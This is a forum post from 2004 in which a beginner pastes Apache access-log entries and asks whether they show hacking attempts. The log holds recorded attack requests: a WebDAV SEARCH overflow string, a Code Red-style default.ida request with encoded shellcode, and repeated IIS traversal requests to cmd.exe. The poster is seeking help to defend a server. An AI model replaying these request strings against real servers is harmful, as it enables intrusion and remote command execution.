vincenzobar
Verified User
- Joined
- Aug 15, 2004
- Messages
- 92
I am getting whats below in my access_log.1 I am not good at reading logs yet (i am a newbie) so can someone help me a little.
I noticed the call for windows command prompt and other weird things. Is this port scanning and hacker attempts. If so what should i do?
Thanks in advance!
I noticed the call for windows command prompt and other weird things. Is this port scanning and hacker attempts. If so what should i do?
Code:
69.46.204.42 - - [08/Aug/2004:09:46:26 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\………….
69.136.130.155 - - [08/Aug/2004:22:40:29 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 - "-" "-"
@
@
@
@
@
………
196.30.250.87 - - [09/Aug/2004:19:33:45 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:45 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:45 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:03 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:04 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:04 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:04 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:07 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:07 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 373 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 388 "-" "-"
@
Thanks in advance!